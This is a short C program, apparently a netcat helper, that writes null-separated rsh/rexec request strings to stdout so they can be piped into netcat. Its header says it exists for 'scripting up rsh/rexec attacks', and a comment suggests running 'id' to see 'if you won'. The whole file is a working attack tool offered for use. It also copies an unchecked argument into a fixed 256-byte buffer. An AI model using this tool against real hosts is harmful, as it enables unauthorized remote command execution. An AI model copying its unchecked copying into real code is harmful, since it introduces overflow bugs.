| /* generate ^@string1^@string2^@cmd^@ input to netcat, for scripting up |
| rsh/rexec attacks. Needs to be a prog because shells strip out nulls. |
| |
| args: |
| locuser remuser [cmd] |
| remuser passwd [cmd] |
| |
| cmd defaults to "pwd". |
| |
| ... whatever. _H*/ |
| |
| #include <stdio.h> |
| |
| /* change if you like; "id" is a good one for figuring out if you won too */ |
| static char cmd[] = "pwd"; |
| |
| static char buf [256]; |
| |
| main(argc, argv) |
| int argc; |
| char * argv[]; |
| { |
| register int x; |
| register int y; |
| char * p; |
| char * q; |
| |
| p = buf; |
| memset (buf, 0, 256); |
| |
| p++; /* first null */ |
| y = 1; |
| |
| if (! argv[1]) |
| goto wrong; |
| x = strlen (argv[1]); |
| memcpy (p, argv[1], x); /* first arg plus another null */ |
| x++; |
| p += x; |
| y += x; |
| |
| if (! argv[2]) |
| goto wrong; |
| x = strlen (argv[2]); |
| memcpy (p, argv[2], x); /* second arg plus null */ |
| x++; |
| p += x; |
| y += x; |
| |
| q = cmd; |
| if (argv[3]) |
| q = argv[3]; |
| x = strlen (q); /* not checked -- bfd */ |
| memcpy (p, q, x); /* the command, plus final null */ |
| x++; |
| p += x; |
| y += x; |
| |
| memcpy (p, "\n", 1); /* and a newline, so it goes */ |
| y++; |
| |
| write (1, buf, y); /* zot! */ |
| exit (0); |
| |
| wrong: |
| fprintf (stderr, "wrong! needs 2 or more args.\n"); |
| exit (1); |
| } |
